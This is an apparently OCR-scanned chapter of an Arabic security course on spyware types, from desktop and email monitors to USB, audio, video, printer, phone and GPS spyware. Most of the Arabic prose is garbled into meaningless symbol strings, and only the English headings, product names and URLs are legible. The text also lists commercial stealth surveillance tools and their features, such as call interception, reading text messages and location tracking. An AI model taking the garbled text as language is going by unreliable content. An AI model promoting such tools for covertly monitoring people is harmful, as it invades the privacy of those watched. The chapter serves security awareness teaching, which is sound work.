Asu ^jc ajjjjj (j^j Agent . jj* > ^ lS^c- ^^-^ ^ j 'Agent s- 3 L -^^>*^ (j^yi^ j^*-*^ 
a^j J Active Directory Group Policy e^J^ <> ji Activity Monitor Server 
C5 ic Agent ^u/" cs^^A 3 sbVI *>a& ^ asu ^jc <Jc (j>u>i-> n ^ji (j^j SjHunll d±aJ a£jJo3I ^ jii .Windows 

.a£jJo3I ^^ic <L^ai<JI j!i jjj^ll s £j A y ^ )*> Jj> > ^ Activity Monitor Server ^^-^ U>i ^ _ jj jn^ll 

.(Sjjj^II) AlxJl ( . n£ all ^JajaJ L_fljV (jiajC 

dujjj f^uijLijl] jj jjU^ll jI^a < fc5 ic- ^-Ij iS^^y* i^ax1\ (j^Uil ^-ia^J (activity log) ^UaUdill <J^joi lSj? 1 ^ 

.Activity Monitor 

JjLojjj (Jjoiljllll CjLoiJjJ t4 aILuiaH j <Loj^<J| jjj^3V1 ^^>J^ (JjLuij) ^A^Jjaui <J£3 diVU^Vl (jC (J-ol£ jjj^j u^3^ 

b j$sS Ail£ Jj>uJI jjjjx^I jl^a. ^ axj (^U jJI Activity Monitor Agent 

^ Ac Linm ty p 



^4 II t LI I i *mj 

! ft i » 9ta ■■« 
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Desktop Spyware: other tools 

dAjjjJa Jj^joiJ ^1 g a\\ j£-oJ .^J^JjouJI dljjljVl j JJ jJJ^ll JaLud (jc Jjj^lilill <J£ <Jj^ > uJ j Jjk-aj] Ifr^AaJ ml (j£-aJ jnmV^I IjA .^Jt jll 
•JJjjJl J 6C_JJjL^.VI J t^aJ^JjouJl JJ Jjjrt^l cJ^XjuLill Jjfj £L-gI Jjll t^aJ^JjouJl <Jj3 (j-G l^JjL j C-LoJ ^^jll £§1 j-<Jl j t^JjlLall 

jj£I j JJxJl ^J^luiJl ^Jajoj J-a dilka] Ikl Ljajl A'^a) .c*13j U j j^l <jpte-l / jJfl <C_lULJl Jj^j j t^JjjJl j jJJ^Wl 

I^Ull j^jll (^5-^ 4_^.jJ>» Asu ^jc L_u£-<JI ^Jajuj Jj^ajl (jjy^lg-xJl 1 g ^ laJLujJ A3 ^^jl! ( . n£ all .< j.i.m-v'^ ^cxaljj j Za« J . J^^ cill^ 

Remote Desktop Spy available at http://www.global-spy-software.com 
SSPro available at http://www.gpsoftdev.com 

RecoveryFix Employee Activity Monitor available at http://www.recoveryfix.com 

Employee Desktop Live Viewer available at http://www.nucleustechnologies.com 

Net Vizor available at http://www.netvizor.net 

Net Spy Pro available at http://www.net-monitoring-software.com 

REFOG Employee Monitor available at http://www.refog.com 

osMonitor available at http://www.os-monitor.com 

LANVisor available at http://www.lanvisor.com 

Work Examiner Standard available at http : / / www . workexaminer . com 

Email and Internet Spyware 4- 
Email Spyware -1 

CjUi^k tilli ^ Laj tSjjL^lt j SjjI jll ^ jjj^IVI «ijjJI cJ^^j jj j ' Jj> >>1 ^ j t-^ajJ ^nlaj jl ^Ujj Email spyware 

^jjjjo^j]! ciA^niaj ^ jjll 11a (jla jjjj c^iJI jj jji^ll j^-?* . j^^3 Hotmail c^jj^V^ 

^Jc. <Jai^j jl ^ ^ A\ ^jjj^iyi ^j^t (S^^- Cy* ^ SjjI jll ^jjj^IVI ^jj^ cJ^-^j £j Ag y Cy* \ ^ 1 ^ J-^jjj lS? 1 "j 

aIij ^ jjlj V jjj;!!^! ^ ^^kiaiJI stealth mode f^jJt tA^a jl jj jji^H c^^^ o-^j^^ 

Internet Spyware -2 

o^ ^"" 1 ^ c> W) J f 3 cr^^ ^j^^ CjUi^a cill ^1 sbVI <jA Internet Spyware 

c ftJj^H IajI tiL ^j^aLiJ! jj jjj^ll J-g^ ^jj^n^l.^u Vj ^ C5^s 'stealth mode j^^ ^ L« >>n ^jj 

l^JL Mill c aLa ^a^jjauJl JjS (j-d l^jjbj C-Lqj ^^jII URL cl^j^- ^J^> . jj jjj^H j^-^ ^^-^ AlfLJl oIjVI ojA ^jc 

,(iL ^aLkJ! JJ jJJx^l! jl^a. Jc l^Jt-La JJJJ 4_LaaJJj3l CjIaI^II jl ^il jjjUc J^ij cJ^^ 

Email and Internet Spyware: Power Spy 

http://ematrixsoft.com :j^^l 

<J£ ujj _ jj jjjx^II jI^a jc Ijjxj el u£ UJ£ jjsu jl^-o tiL (j^aLkJI jj* jjjx^ll jlg-^. <jsIjaj till ^ajujj Power Spy ^jj 
Windows J IMS ^^j^j^ tl^jjU jj dL<»a Jll j^^j^j JJ^V^ ^J^^ cJ^^jj ^jjI^JI djUjjJa j jy^W 
'ICQ ^GADU-GADU ^Google Talk ^Tencent QQ 'Yahoo Messenger <SKYPE '(MSN) Live Messenger 
^31 J.J! CjUK j clipboard cJ^^ ^ ^ c> jStj '(AIM) AOL Instant Messenger 
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J^joi Jj jjjtajll (Jjujjjj tljjoj (Jasuj t^Uaill (Jjxjujj £,jj £a UjliJj j^jj _6^iL<J| Cjlajflajllj tia! jill ^j3 tLljI^lLoixJl ^j3 tlfrJjtj£ 

.Jjjj J J^J^ (j* A\<i a ) .FTP J yHJJ^V^ 




ft ftp://^™ trrxsoft, com 



Internet and Email Spyware: other tools 
6 ^uj^ j 6 yH jJ^Vt ^J^' J 2^ ^1 jxi^L ^jij U£ J j-> . . n i ^ jL Internet and email Spyware 

<£jjuJI iai^Jj dljjjjVI ji*^. (ililjlc. aaJ 4il j ^ all L_flj*l J^Jlj 4(j^aljSVlj * JJ jJJx^li CS"^ ^H^*^ ^--^J^J 

j^JUll j^jll Jc JjJJ^lVl .JJjJlj dujjjV I (JjJjud^jll £tx»ljJ C-paXJ Jj LgJSj ul^Jl j J^ a all 

eBLASTER available at http://www.spectorsoft.com 

Imonitor Employee Activity available at http://www.employee-monitoring-software.ee 

Employee monitoring available at http://employeemonitoring.net 

OsMonitor available at http://www.os-monitor.com 

Ascendant NFM available at http : / / www . ascendant- s ecurity . com 

Spylab WebSpy available at http://www.spylab.org 

Personal Inspector available at http://www.spyarsenal.com 

Cyberspy available at http://www.cyberspysoftware.com 

AceSpy available at http ://www. acespy . com 

Emailobserver available at http ://www. softsecurity . com 

Child Monitoring Spyware 

.cicala jjc. ji ciijjjjVLj ^L^alo *\ jjoj jj jjfaSlI Jc- tillUJal <j ^JL 1* 4j31j* j ^jjjj ^ ^j^jH Child monitoring spyware 
cjSjII ^Liaa Ai j*^ J Child monitoring spyware ^l^lal * CjI j* J Jilall <u ^jL U jiull ^> 

11a ^jli tC-ujiull Asu .^aaaL^j tiljl ^qjq^; qjAxj V ^— a jjuj ^llliJai (Stealth mode)^f^ J lU*^ ^ . jjj^I cs-^ 

-LaLudjll (j-a CjI jVql ikl j t^jjj jLall J^j J ^rjiUdlt diLjjJa j tlgjjL j l—LaJ £3 1 ^<Jl j t^A^jjuixJl ^c^l jjll <Jj^ > >nj ^jli ^jjlajll 

• ^ 4 J<fl^ a\\ 4-$J>l j <J^-^ (j- 0 cJ jll clA^ c — ^J*^ .4_juitjuj| Jc j(g hi 

jIjjc lUjj jl SjLLa J^ c-iL J Ul ^ jajjj jjjj^I J^ cilliL J^j* Child monitoring spyware 

Ls lc L* t jj* jjj^II jl dijjjjVl Jc ^Jijj ^ili da jll jl^Lo t<ja ^UjjJajl) ^ia ^j* ^il! dia jll ujj Lg£ ,^^a3I Jjjj^IVI ^jJ^ 

.Ij^. ^l&j ' jj jjj^II 
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Child Monitoring Spyware: Net Nanny Home Suite 

http://www.netnanny.com 

jj£ ^ji^a qa ££J£i\ JiUl ajU^J cill ^uoij <i±*j±ti\ ajU^JI CjIj^I Net Nanny's parental control software 

(j* ^IjIaI] CijjljVI f\ I^LujI c>5 ic Jali^JL till ^ajujJ <^^J (jc ojUc ^ .(_£J^-^ AjulaJl CjUjI^xJIj ^1 J-a^J 

4_*K> ^^a^a J j^i j jajj .cyber bulliesjIM predators ^Wf" .u^ i> ^jj^ Jlj ji>yi 



Net Nanny Home Suite allows you to track 
and monitor what your kids are doing on 
the computer 



It allows you to see logs of children's 
Internet activity and instant messages 







Nannv 




T w Net Mam? tnrt 

re n 11 dap-v 



o 



VdHr^n „i,,. 



Setting Window 



i~3 m 



"3 A rawit^wi 



Filter Window 



http://www.n etna nny. com 

Child Monitoring Spyware: other tools 

; JjjjuJ! ^ a! > nj ja jli ^j3I (JiUl j>J s j-" oaaSI ^a\^ ^ja ^* j ^Jj Uua 
Aobo Filter for PC available at http://www.aobo-porn-filter.com/ 
CyberSieve available at http://www.softforyou.com 
Child Control available at http://www.salfeld.com 
SentryPC available at http://www.sentry9c.com 
Spytech SentryPC available at http://www.spytech-web.com 
K9 Web Protection available at http://wwwl.k9webprotection.com/ 
Verity Parental Control Software available at http://www.nchsoftware.com 
Profil Parental Filter available at http://www.graftechnology.com/ 
PC Pandora available at http://www.pcpandora.com/ 
Kidswatch available at http://www.kidswatch.com 



Screen Capturing Spyware 
c^ill jj c> screenshot cjILSI i*j J jj j^ill <j3I j*j t*U ^l^j ^1 jj ^ Screen capturing spyware 

Jqjui^ ^^xJl FTP J' c^JJ^V^ ^J^^ L>^ U^^W-^^ 0 JJ (3^^ CS^ ^-*J>lj-^ o 
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jA\ (jjjUc i (JjjjLJ! JaUij t^jjlLJI djUaxjja Ja£iL Uiajl CiUaSl Jalilll Ij^lS Jaaa ^jjjJ Screen capturing spyware 

^jJaj {Ja*J 11a .^JujLudll ( * J ^>' Q ^ ik) ^aja^U CllS jj| 4<^.*ti JJ jJJx^ll G J£^i gjA'S * lajudJl ^-ajl <£jjua3lj 4_L^1xJ| 

.^aIo jjlc (j-oaoi ^1 <ia^j| ^> jSaE ji^ (stealth mode) 

lifc j(*1j .(Hve)j^ jj;^^ (? * w y L^jV jj jj;^^ ^^Jc ^LqA^JLuiaII ^JaJdjl ,jj,jj*jj jj jJJ<^ AjSIj^ ^jj^.I^LuiaI] (j£-aJ 6£c-gIjjJI £>i& £x» 
^^Ic <J-ac <J£ ^^Ic L_flj*j3l ^Ld^jjoiAll (j£-aJ i— j jj jJAA^li ^glc ^nlaj <J£3 t - it Ual i^L - <jilaJI AjflliuiJ ^l^U jjII 

. C5 £jiaJl CliS jll ^ jj 

Screen Capturing Spyware: SoftActivity TS Monitor 

http://www.softactivity.com : j^-a^ll 
<jSI j*j t*U . ^vim^ l lU^ J£i cjILSI ^ill j terminal-server sessions SoftActivity TS Monitor 

jl Jjiall ^ j*j (Windows terminal server) J^* >5t ±xA\ ^vim^ l 4_k£>l 

(C;\ l_jj£jj qjI A£jjuj ^^ic I^LuiaII ^ixij La AjSIj^ Ljajl ^ .RDP lI**^ ^^-^-J lS^-^> L>* ^4 

.Ajia alij dil udlaJi (Jj^ i uJ (j^J^a (jc ^.j! j^Jl ,jl,Jcl ^^^ic djljjisull ^^jj jj Uiajl A 3& .(jU-ajVI <^Jjuj ^^5^ ^lx»U^)J 

terminal ^ .u^*^^ u^^j j - ^^ ^^■^j .o^*-^ 3 ^ ci^ **— j ^ ^Sjjuj ls^^ 3 ^^j^J^ ^—^-^ 

.Qi A^LiixM UUi jj^i server monitoring software 
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Screen Capturing Spyware: Other tools 

CjILU ji l$j jjLUt jl tiUikl jj jjax^I <iaj^j| ^ ^joij ^ill jJI Screen capturing spyware 
Screen capturing c> J^^ ^ ciiAJI jj jjj^II j1^j> ^ jjjki j Jill Screenshot 

;^U3I j^j]| ^ spyware 

Desktop Spy available at http : / / www . sp yar s enal .com 

Icy Screen available at http://www. 16software.com 

Spector Pro available at http://www.spectorsoft.com 

PC Tattletale available at http : //www.pctattletale . com 

Computer Screen Spy Monitor available at http://www.mysuperspy.com 

PC Screen Spy Monitor available at http : //ematrixsoft . com 
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Kahlown Screen Spy Monitor available at http://www.lesoftreiion.com 

Guardbay Remote Computer Monitoring Software available at http : //www, guardbay. com 

HT Employee Monitor available at http://www.hidetools.com 

Spy Employee Monitor available at http://www.spysw.com 

USBSpyware A 

cjUL USB spyware. USB jU^ j j^j^^^ J^- u > in o^ <^W*j* J USB spyware 

# ^£J <j^aLkll jj jjja^l S j^j^J ^^-Sc ^jjjjud^jll ^c-al jj J j^. j (j-a <jjj 

qji USB s j$J JaL& <Jc ji3 USB spyware. USB^VL^sl iaU^ ^ <^ jVl J jk USB spyware Jjt 

^Uaill cJ^-j ^ c ^j3I j &Ia jjc. j (device) 6 j&^l j* ^^aj 
m Lh\\))U\\\ j jj jjj-*£ JU^h USB JU^ c£' u£ ^3 C5^^ ^-^^ J^kj j Jj> > .n j <j^j^ j JalSill £&jjj USB spyware 

St.il IgAxj^Jj (jjjui^jllj jUlkVlj (Jlxill J J^U ^3j£ a 1 ^ *^ l£^J ^ ^ (J^*-^ 2^^^ LS^ 0 J-^^ J 

.1— iLia ^Jjll *\ > <aj3 4 ajhr* 

(J£l 1 - gakla ^gJjj gaflJ J^juj (jlajsu .(j^-V <*-^j ^ <xj*.I ja!3 a L_aL» AIajJaaj USB j^-?" U£ ^VIj^jVI ^Ja's lajjL 

J-a*j 11a .c Lijja^ll jj jjj^ll ^ ^Uaill jjl j-<i ^ !>Ula USB spyware ^^*>nj .^c^JI diL* jlx-a ^ ( . 1<v > ls^\ ^-^W di^^U^ 

. jj^jjll <> Sjj^VI ciiljl^VI fkx* J^xj .spyware J adware V USB spyware 

.s^ 3 uj^ t> ^k o-^ lJ\ USB Sj^i c> ^iLJl ^judij USB spyware 

.(background copies) y?^^ c> c^^^ 6 3 - ) ^' f <^^j^ - 

^Cjlajjlajll j jj jJJ^ jl > J ^ > *aJ ^ USB dh^ ^ jSlall CjljUJl (Jjkj j (Jj^ > >n j (jiajc j Jalajll cill ^jjj 

http : / / www . ever strike . com : j^-a^ll 

li^j .CjUjjJajl) j jj jJfa£ ^J^ala USB jW^ L^^ ^3 ^^^^ J^kj j Jj^ > >n j (J^ajC j Jalfijll (j-d <aJ USBSpy 

(Jlsti jjyajj] <Jj3 J^jJj 6 6 j£J>.Vl j\ jl^J>Jl l!^*-^ 2^^^ J^J^ ^5^* cJ-^^ J t^llj^ ajjll ^Uakl ^j^j^j] ^ ^jhr> Stal W^j 

Djjlill <j^»j .^jau^ajll j JjUMl (j^ljc-V <1 j^udj l^jlj J jj^a jll (j£-*j (USB Traffic) USB jjj-^^ ci*^ -uj m1 ^'^ j j^-^^^ j 

j^joiJ CIjVIj^jVI ^JJJ l!*-?^ J ( -— J ^ .Jaflfl AjjUa^ll CjljUJl ^a^5J C _ 5 J^- 



liSWSpy 



n ^ Port 1 : 

n -■ 



r 






Ml T rt>* 


w... 


riwi ... tw 




IAS 


0 


•uu 




lis* 


a ami us 


e*«-:» * to . « Lt 




1 




_.J*_lHSXRfiL^T TRAM . 


PI 


0 05007; us 


Bn»4 <o-eit 






MULK 




M 




^ co-ett 






UU 


C* PilEJWUPT TMM„. 


M 


O O^OOOfr U9 


BPCO-^COMtlE.. 






•tu 




1M 


O.QTOIQ1 US 








•w 


_0*.WTEWHrT_TM« . 


1M 


O 070103 UE$ 






* 


•ux 


C*l H*TtH-JHJ^T TRAVIS 


w 


OOTOIDl US 






7 


feu 




:r. 


OOTOIOI US 






« 


fluu 




M 


donus us 


<OtA1C ■ 






BUL* 




IM 


US 






14 


*UUC 




Pi 








II 


•UUC 


C* IMTFIB-PU^T 


pi 


O 090130 US 


poo+flwie. 




12 


■ULK 






O MOIS* US 


i 




*3 Ri« 










9 X 



US* l>*W* Pt4 



USB HID 



Bin. 000 00 000 JkmcXX. 



https://www.facebook.com/tibea2004 



422 



USB Spyware: Other tools 
\JN& J>uJI jAjSaII USB Spyware cjliuks <> 

USB Monitor available at http://www.hhdsoftware.com 

USB Grabber available at http://usbgrabber.sourceforge.net 

USBTrace available at http://www.sysnucleus.com 

USBDeview available at http://www.nirsoft.net 

Advanced USB Port Monitor available at http://www.aggsoft.com 

USB Monitor Pro available at http://www.usb-monitor.com 

USB Activity Monitoring Software available at http://www.datadoctor.org 

Stealth iBot Computer Spy available at http://www.brickhousesecurity.com 

KeyCarbon USB Hardware Keylogger available at http://www.spywaredirect.net 

USB 2GB Keylogger available at http://diij.com 

Audio Spyware 

2-aljj cIujjj . jj jjia^II c>5 ic d jl aji jj^II db^ JaliiilV ^ a - ^ ^^jll d jj^II <jSIj-<J Audio spyware 

^JjJ AlLaL^a <LjlaJ jj jJJ^ll ^gic d (jnm^l duJJJ ^jj . jj jjja^l ^AaJLaLd (j-a ^jil ^^ic J jj^^JI <jj,J jj jjja^l (Jjjjuo^jII 

^) ( . lUaJJ V d jj^II (jjjjoi^J £^J^ ^sl ^Vlml .IjJ^J jJJ^^I dl jj^VI t frV^ a (Jja > >nl AjalaJl (JasUj ^^JjoiaII J^*-*^] cJ^jj 

.AJjb] dl jblal 

^Jc. a L_alxi 4_L^jab<J! dl jj^VI Jaia. ^jj . jj jji^ll ^^^ic dl jj^VI a^- jjj-s a J^joijj Ajl-sjj Audio spyware 

^£j^j13 £>i& d jj^II (jjJjai^J jj I j^>lklujJ (jjjLjall ^Ixj^JjoiaII jl (jjy^ig-xJl <jl£ c^Ulbj .(j^V dlSj ^bjloj^l! C5 i^xJl (j^ajUl 

,4jjjoj dLa jl*-* ^^^ic ^^Ij t^^^liVI <*-^lj dUJl^xJlj ^ a all d^Lj^> aJ .Jj^jj 

jj jj* dl3 <juj^j^3I dlkniaj < alia o Ajj jj^II <juj^j^3l JjLojj ^^ic ^jjjjoi^jIIj (Jj^ i all I ^^ic j^la Audio spyware 

I jl^aljJJ (j-a Aijst-d j (JliJaVI jl 1 (gj^h d^aLuLq (JjjUU (j^J d jj^all (J»imi^1 

^j£x»j .<U ^1 ^ fljl j^JI j tdU jj£j-<JI t JjojjII c aliai ^ Jla Aj^Sjl! d jj^JI 6 j^l <j5I j-<J Ig^hviml (j^j Audio spyware 

^j^jll ^ajujj Igil ^Jl t<jj ^j]| JjLojjIIj t j ingoing Sj^U-JI dUJl£-<JI <jSIj>»j di> ^ull (Jjjia (jc jj^II dlij^L^JI Jj^juij 

.GPRSo 3 ) J <j(r? <jr> £f" J 'dUllUl ^.lA^ Jjt> , uj ^SMS J^ 'd jj^JI <jal jx» j 6<±aJl ^lliLal! 

Audio Spyware: Spy Voice Recorder 

http://www.mysuperspy.com :jAx^ll 
^likj i _^Llaj3l ^^Jc. d jj^II Jj^joajj d jj^II -i^ji ^ ^.auij c5^^ j^ jj;^^ (jjjjoi^j* ^cxiljjj Spy Voice Recorder 

dlajjJaj * alia o ^1 jjl <il3i Lftj <jj« mi dli 4_jjjill <JjLujj3I ^x»Ijj jl <j^Ij^a3I ^l jj ^ jja^JI dijjjjVI <juj^j^3I dlj^La^ 

'Yahoo! Messenger Voice chat 'Skype Voice Chat 'MSN Voice Chat ^j^V^ <^^l Ajjj^JI cjj^UVI 

dljj^al j ^^Iloj^JI c_lxJ j tdlj jjjVI ^ ^ J^VI AialLal! dl jj^aVI Jj^J UiaJl .^Jl Fo/c^ CA^ 6 /C^ Fo/c^ CA^ 

,^cll tdlcLojudli j jj^j^ll 



Fil« Option About 



00:00:27.9 



Save Path: |D:V>rogram F*esVvcdV>ata 



"L 



set optnns 
R AutoStart 



Recordng Options 



[~ rtdeTray Icon f~ HkIc Instal Path 



f* Record wi±i Program Srartuo ""^Save Fies^nutes 

f» Auto Record Task Management 

jAuto Recorc \'/Ter Skype » c«ce Chat Activate 
|~~ Auto Record When QQ Voice Chat Acttvate 
l~ Auto Record When Yahoo 'Messenger Voice Chat Activate 
I - Auto Record When Voice Chat Room Activate 



Hotkey Setting 
C* Default Hotkey Ctrl + Art + R 
C Set Hotkey Ctrl + AH + p ~H 
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Audio Spyware: Sound Snooper 

http : / / www, sound- snooper. com : j^-a^ll 
eli^j Cj jj^II Jj> > >n I^jj .^Uaill ^^ic djl jj^VI cj^Li^ > >n j tdj j-aj ^.<u.uj ^^31 (j»imVi ^c^U^j j& Sound Snooper 

CjliLJ! ^jc ojUc Cljlaa^ ^jjj^IVI ^O^t cJjIjujj lS-^J^ 5 j^^l dAiLa ji\ ^ ^1 ^ Cj jj^JI dAiLa ^J^^jj ^AxILa Cj 



CZ Sound Snooper 


HBE3 


File Options Help 


SB Live! Wave Device 


Voice 


i 1 ... . . A 1.1 JLi 1 , .1 *l uL I 
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Pause 
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Video Spyware ± 



q\ (j^j j J ^ j^-^ iaUij <J£ <Jj^ > uj cilj£ ^ j t^cxilj^)JI 11a , jj^iill Video spyware 

CjI gj/nti l!^*^ ci^-l cl>^ J' ^UailL (JL^jV! (JJ<q1 g ^ajujJ jJ-l}s3! (jjjjai^j Asu (jc <J jj^ jll ojjLd .Ijjoj ^^liiil 





User 



Hacker 



FiWg^ Spyware: Webcam Recorder 

http : //webcamrecorder. com : j^-a^ll 

^jj^aldH Jaxj c _^j3I cjI jj^I^II (JiLo 5jujLuJI *(^* i£\ <Sy> y ^ ^ l^^^ j j^A^^ <jal^<J ^U^j Webcani Recorder 

_C_u£^J| ^Imi ^^Jc. L_lt*-I! j 6L_J JJJjJ J^'-^^ ^ LS *W J ' 4_jujJjA3l dilj^L^i (ciL ^aLkll 



https://www.facebook.com/tibea2004 




Carted 



h ttp ://webcamrecarcier. com 



Video Spyware: other tools 

;^JU3| ja^ll Jc Q^\jt>^\ b^l ^Ld^JjauJl jJ-liill (jjJjud^J L>* C-H 3 *^ J .^J^ > ^ 

WebcamMagic available at http://www.robomagic.com 
MyWebcam Broadcaster available at http://www.eyespyfx.com 
Digi-Watcher available at http://www.digi-watcher.com 
NET Video Spy available at http://www.sarbash.com 

Eyeline Video Surveillance Software available at http://www.nchsoftware.com 
Capturix VideoSpy available at http://www.capturix.com 
WebCam Looker available at http://felenasoft.com 
Security Spy available at http://www.bensoftware.com 
iSpy available at http://www.ispyconnect.com 

Print Spyware J- 



jJjL£l3! JLojjV Web foriliat lS^ 1 ^al 3 qVl^ ^ Jl£j^j| J ci^^ J^J^ Jj> > >nj J^J <clik3l (jnm^l 

JUi J^ jl c^j jSjVI j\ C±i j^V! J^k ^jjjilVI ajjJ! 
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. 

Printer 



S p oo l 



1 




Print Server 



User 




Attacker 



Print Spyware: Printer Activity Monitor 



http://www.redline-software.com : j^-a^ll 
^l^kiojl aJs\ ^1^*11 JjS c> W^* 1 *^ (4j yr^ a^USJI u^ 1 ^ £*Lh i> ^ Printer Activity Monitor 

:Printer Activity Monitor c> ^ aJWI *L^Vl J*£> j^-W^ 

_<C.Ulal| ^l^i <a^j . l 

CjSj ^ CjlsuUall *&J^ ^I^Cl -l^J .2 



hi II ■ n 

..... .. ri .., 

. r ■ , ■ ■ ' 



- J 



■.' I . L -«l Jj ■ I 



\twm 

Qjh'-p-iWVpv*-ip; 

- 1 ! Jitanaiw 



a 4 L»Tian» 

% EtIMfez 

J «ri' * m 
■ J llEMdilrT 
I ' + * 

4* hrrr>j«rrt Jim 



-T ■( 



B 

I u -■ 

— 1 ... 

□ LI.LlH. 

□ .tUt, 



L1M 



li-.>ir| , I s.... 

■4I-.I* lm| 

■ nni 

^ id* 'mwii 

4 BhA 
i .,.,1-. 

J| K*lh(lrJl-.^,-l. 

£ HTn 

V - i ...htUI^ MliiBE 



<sulla3l ^I^JjujI J j^. CjU» jlxxi ^^Ic <J 1] Ajullall ^jjjjlu^j <suUa3l CjlkifLlill ^I^JjujI Uiajl ^ aJ ^jj-^l^ll 

^il! dlS jllj ^tJjljj ^ jflaxJl J^^ J*^ * <-&a ^ tall f \ l^Loai ^fiiJ ^ia^I^xJI ^cLoij djlkiflajll I^A ,c fl^JI 

(_>iasu ^^Jj J^)^- tAc-lJalt 4Jia^ijjaj| 

Print Monitor Pro available at http://www.spyarsenal.com 
Accurate Printer Monitor available at http://www.aggsoft.com 
Print Censor Professional available at http://usefulsoft.com 
All- Spy Print available at http://www.all-spy.com 
O&K Print Watch available at http://www.prnwatch.com 
Print Job Monitor available at http : //www. imonitorsoft . com 
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PrintTrak available at http://www.lygil.com 

Printer Admin - Copier Tracking System available at http://www.printeradmin.com 
Print Inspector available at http://www.softperfect.com 
Print365 available at http://krawasoft.com 

Telephone/Cell Phone Spyware 

4i! Cilia _4_i^jJa3! jlaJl L_fljl^Jl/L_fljlA (J-al^ll <J jj^ jll LaJ CllLia ^j; SIjI j& ji^Ji L_fljl^Jl/L_fljl^Jl Jc ^jjuui^jll 

(JjLui^llj dljjljVI ^1 laJLujj <JiLa L_fljlg_ll C5 ic JaLuU lOgj (Jj? ' ^ dilllllajH £>aA ^a j£j / fljlfrll ~ I^ILu^q (jC LaLaJ <juiij ^ajli 

^laaJLuil ■J-^^ dilllllajH oaA ~1 I^JLujI ^aJJ 66jlc .JjjJ^lVI * J J 1 "** a ^ (J^-^^ ^llj (j-a CjLg jlst-<Jl £>i& Jc J jj^aJl 

.(s^jlj Sj^U-all cjUJUJI aK (call history) cJ^- lsj^ - Call History 

L^ia. jll t5 ja. JjLuijII Jc- ^^UaVI clA^ .oj^U-all j ft^jl jll Ajj^aill JjLuijII s^aLLq ^ cilj£ *j - View Text Messages 

. J^uoj jjj^j c^L Jl l $W>un ^jjujj lJI^JI J^U. I^j jUj duj Jll ^Sl jJI £i*aJ J*t£ J^uoj - Web Site History 

J^laJl t fljlfrll ja (jC Ij^aJl iilllA -C5 lliaJl CjS jll c fljl^Ji (jj^J (jnmV^I ^cxil till J^-laJ L_fl jjuj - GrPS Tracking 



^UJl ^xujjJI ^ (jxua jA La£ J^xj CjUjjMII dift 




Satellite 




User 



Transmission 
Tower 



€5 

4ft 



Hacker 



Cellphone Spyware: Mobile Spy 

http://www.phonespysoftware.com 
iiiiii J| ^Ii^j .< J L_fljl^JI <Jajaij| cJj? ' ^i^^ii C5^J J Jc (jjum^jll M^obilc Spy 

ajll J^juJ lA jj^J djUill L-ljoia 

jjj^II Jj? ' "*^J ^1 J-^l ^aUaj ^JJJj t^al Aj^jj t4jC.Ldla.VI ^a^lc-VI cJ^^J ^-^^J-^J ^J 1 gaill <JjLuj^)3I (Jja i (JJ^^l & aW ^luiI 
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Telephone/Cell Phone Spyware: other tools 
c fljlgj) Jc iaUij J£ Jj-> > >nl ^ jliJI t fljl^J) /c fljl^Ji Jc ^jjjjud^jll aJUII ^1 jJI ^hviml Uiajl ^ 'Mobile Spy 

VRS Recording System available at http://www.nch.com.au 
Modern Spy available at http://www.modemspy.com 
Mobistealth Cell Phone Spy available at http://www.mobistealth.com 
SPYPhone GOLD available at http://spyera.com 
SpyPhoneTap available at http : / /www . spyphonetap . com 
FlexiSPY OMNI available at http : //www . flexi spy. com 
SpyBubble available at http : //www . spybubble . com 
MOBILE SPY available at http://www.mobile-spy.com 
StealthGenie available at http ://www. stealthgenie. com 

GPS Spyware *t 

jl (j ^ ui jl SjLloJI j>» ij i^j] (GPS) c^^-*-^ ^ f laJLujj Jilj daLi^ ^j; (j^flaj j\ jl^a. j& GPS spyware 

^Vlm^l S^aLuLa dJ ^aJ ^.h <^l jjJ^lVl ^^^l (jl IgJb n jl j <J^joi L_flLi J lifc (jJ^^J jl hq^> j L_fljlg_ll ^jl^-Q Jallj £JJJ 

Jc c fljlgJl (jl£* (jc jasu jll j t V^U ^l^alall A ]~A\\\ jj! (J^ajC j ^11 J jjj£3VI (jl j^C Jl J j^Jl (jJ Ja (jc L_fl^Jl 

; JU3I <J£juo3l J jA ^il j-<JI aj^j (Jjjjo^j 






Ve Hi c le 





Tra nsmissi on Towe r 
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GPS Spyware: SPYPhone 

http://spyera.com : j^-a^ll 

^1 j (jjjia cjc ciL (j-aUJI c_jLo^J L-fl^lud^li J j^^ l c fljl^il GPS J^j^ cs^' GPS (j^'o" SPYPhone 
Spyera Spyphone Au 3 ^1 J^^Jl cil^JI ^ ^UjJI b& c^ii ^liaJ . SMSj' lA j' gr? yr> <3G 

(jjj^j A'&a) Jj B t*L (j-aUJ! L-JJjIt L-jLuo^ Jkb iSaJjiJl c^ili J CjLSI^I jLg-k»V ^Sl jxll ^j^j] GPS f^V: 

I^UjJI bfc ^bVimU p.Uj£Vl J*i til&aJ 

.t*Sja^ll t_fl^JI Jjj 2ujIS1I 4_l^3I JjLujjII s^IjS 

. J j-<^a3I c V^ll ^jojI jjKll ^L)^ 



Features 

o Call interception 
o Location tracking 
© Read SMS messages 
• See call history 

See contact list 

Read messenger chat 
& Cell ID tracking 
& Web history 




http ://spyrra. com 



GPS Spyware: other tools 

EasyGPS available at http://www.easygps.com 

FlexiSPY PRO-X available at http://www.flexispy.com 

GPS TrackMaker Professional available at http://www.trackmaker.com 

MOBILE SPY available at http://www.mobile-spy.com 

World-Tracker available at http://www.world-tracker.com 

ALL-in-ONE Spy available at http : //www. thespyphone . com 

Trackstick available at http://www.trackstick.com 

Mobistealth Pro available at http://www.mobistealth.com 

mSpy available at http://ar.mspy.com 
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How to Defend Against Keyloggers 



^Jjli-Q <Ja. j] Jc \ frljtj£ ^aJJ ^31 JJJ^ c — ^ ^ ^ ^ ^f^"^ ^—^J^ ^J^> cJ> ujJj laSjL (^iH J^JllaJ j& jj^> J^^l 

4j]j|jx» jl ;L_flJJa. jl 6J jlixJl diljUJl fijlxlail (JIg ^jLaaVI ^Ijj*JjujVI J^> jK CA Ja ^j; jJjIaJ S-ljJ C5 JoaJJji : l L-flJ^Jl a JJ j-Ua^II 

<jj^J| 4jjjjoi JiLd 4lilla (_£j^j ^jlal jC«V (jjA^lg^Jl 1 g a iklLaLj ttillj J^*^ J." ^aUaj (J^Luua aJa ujJ j 4(JlilaVlj (j^a J^l 

JJC. <J ji*J Jc <J jj^aJlj t^jj^-all L_jLud^Jlj L_flj*l j^Jl ^aUjjIj (jLajjVI CjlaUaJ Jc <J jj^aJlj 6 JjuJI t ** & JJ > n£j j t^iila j>Jl 
